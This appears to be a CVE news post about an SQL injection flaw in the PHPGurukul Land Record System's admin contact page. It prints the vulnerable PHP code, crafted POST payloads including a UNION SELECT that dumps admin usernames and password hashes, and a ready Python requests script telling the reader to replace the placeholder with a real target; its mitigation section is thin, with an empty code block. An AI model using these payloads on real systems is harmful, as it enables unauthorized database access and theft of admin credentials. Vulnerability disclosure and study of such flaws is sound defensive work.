CVE CyberSecurity Database News

CVE-2025-25357 - SQL Injection in PHPGurukul Land Record System v1. via /admin/contactus.php Email Parameter – Full Exploit & Exclusive Analysis

Poster -

---

Introduction

Recently, a serious vulnerability (CVE-2025-25357) came to light in the PHPGurukul Land Record System v1.. This high-risk SQL Injection bug allows remote attackers to execute arbitrary SQL commands, and possibly even arbitrary code, simply by tampering with the email parameter in a POST request to /admin/contactus.php. In this post, you’ll find a clear explanation, working proof-of-concept exploit, and useful references. If you run this system, patch immediately.

Version: 1.

- Vulnerable File: /admin/contactus.php

CVE: CVE-2025-25357

- Impact: Unauthenticated attackers can run arbitrary SQL queries, potentially gaining admin access or executing system code.

Here’s a simplified and exclusive look at the relevant vulnerable code inside contactus.php

<?php
// ... other code

if (isset($_POST['submit'])) {
    $email = $_POST['email']; // No sanitization!
    $query = "SELECT * FROM contacts WHERE email = '$email'"; // Dangerous!

    $result = mysqli_query($con, $query);
    // ... do something with result
}
?>

- Problem: The $email parameter goes straight into an SQL query without sanitizing or escaping user input.
- Result: Attackers can inject SQL syntax, changing the query's logic or triggering unwanted database changes.

Target URL:

http://target-site/admin/contactus.php

Crafted POST Request:

POST /admin/contactus.php HTTP/1.1
Host: target-site
Content-Type: application/x-www-form-urlencoded

email=' OR 1=1-- -

SELECT * FROM contacts WHERE email = '' OR 1=1-- -'

  This always returns TRUE, allowing the attacker to fetch all contact records.

3. Extract Admin Hash:

You could attempt to escalate the attack to leak sensitive info or foster further exploitation.

Example to Dump Admin Table

http
email=' UNION SELECT 1,username,password FROM admins-- -


- This could let you grab usernames and password hashes for admin logins.

---

## Automated Exploit Example (Python)

Here’s a quick exploit using the Python requests library:

python
import requests

url = "http://target-site/admin/contactus.php"
payload = "' UNION SELECT 1,username,password FROM admins-- -"
data = {'email': payload, 'submit': 'Submit'}

response = requests.post(url, data=data)

print(response.text) # Look for admin usernames & hashes in the response!


Note: Replace target-site with your real target.

---

## Impact

- Database Dumping: Attackers can steal all stored contact and admin data.
- Admin Hijack: Grab admin login details and use them to take over the back-end.
- Code Execution: By abusing certain SQL methods or uploading PHP files (if file uploads are present), attackers may run arbitrary system commands.
- Prolonged Breach: Attackers can plant backdoors, adding more risks.

---

## Mitigation

- Update/Patch Immediately: If using this script, remove or patch contactus.php to sanitize inputs.
- Use Prepared Statements: Always build SQL with prepared statements or parameterized queries.

php

References

- PHPGurukul Land Record System
- OWASP: SQL Injection
- CVE Record (NVD) *(link may go live after publication)*

Conclusion

CVE-2025-25357 is a textbook but critical SQL injection flaw. If you use PHPGurukul’s Land Record System, investigate and patch immediately. If you manage similar PHP/MySQL code, audit all your database access points to avoid being the next headline.

Timeline

Published on: 02/13/2025 16:16:49 UTC
Last modified on: 02/14/2025 19:38:15 UTC